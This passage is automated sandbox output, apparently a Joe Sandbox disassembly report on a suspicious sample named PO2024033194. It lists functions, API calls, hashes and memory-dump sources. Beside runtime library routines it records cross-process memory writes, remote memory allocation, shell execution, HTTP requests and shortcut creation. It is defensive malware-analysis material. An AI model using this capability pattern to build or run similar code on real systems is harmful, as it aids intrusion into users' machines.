                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                  • String ID:
                                                                  • API String ID: 2625713937-0
                                                                  • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                  • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                  • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                  • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                  Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 0041780F
                                                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                  • __getptd.LIBCMT ref: 00417826
                                                                  • __amsg_exit.LIBCMT ref: 00417834
                                                                  • __lock.LIBCMT ref: 00417844
                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                  • String ID:
                                                                  • API String ID: 938513278-0
                                                                  • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                  • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                  • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                  • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                  Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                  • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                  • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                  • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                  • ExitThread.KERNEL32 ref: 00413D4E
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                  • __freefls@4.LIBCMT ref: 00413D74
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                  • String ID:
                                                                  • API String ID: 2403457894-0
                                                                  • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                  • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                  • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                  • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                  Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                  • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                  • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                  • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                  • ExitThread.KERNEL32 ref: 004151ED
                                                                  • __freefls@4.LIBCMT ref: 00415209
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                  • String ID:
                                                                  • API String ID: 4247068974-0
                                                                  • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                  • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                  • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                  • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                  Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: )$U$\
                                                                  • API String ID: 0-3705770531
                                                                  • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                  • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                  • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                  • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                  Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                  • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                  • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                  • CoUninitialize.OLE32 ref: 0046E53D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                  • String ID: .lnk
                                                                  • API String ID: 886957087-24824748
                                                                  • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                  • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                  • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                  • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                  Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: \
                                                                  • API String ID: 4104443479-2967466578
                                                                  • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                  • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                  • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                  • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                  Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: \
                                                                  • API String ID: 4104443479-2967466578
                                                                  • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                  • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                  • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                  • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                  Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: \
                                                                  • API String ID: 4104443479-2967466578
                                                                  • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                  • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                  • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                  • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                  Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                  • API String ID: 708495834-557222456
                                                                  • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                  • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                  • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                  • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                  Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                    • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                    • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                    • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                    • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                  • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                  • String ID: @
                                                                  • API String ID: 4150878124-2766056989
                                                                  • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                  • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                  • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                  • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                  Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: \$]$h
                                                                  • API String ID: 4104443479-3262404753
                                                                  • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                  • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                  • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                  • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                  Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                  • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                  • String ID: <$@
                                                                  • API String ID: 2417854910-1426351568
                                                                  • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                  • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                  • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                  • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                  Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                  • String ID:
                                                                  • API String ID: 3705125965-3916222277
                                                                  • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                  • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                  • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                  • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                  Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                  • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                  • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
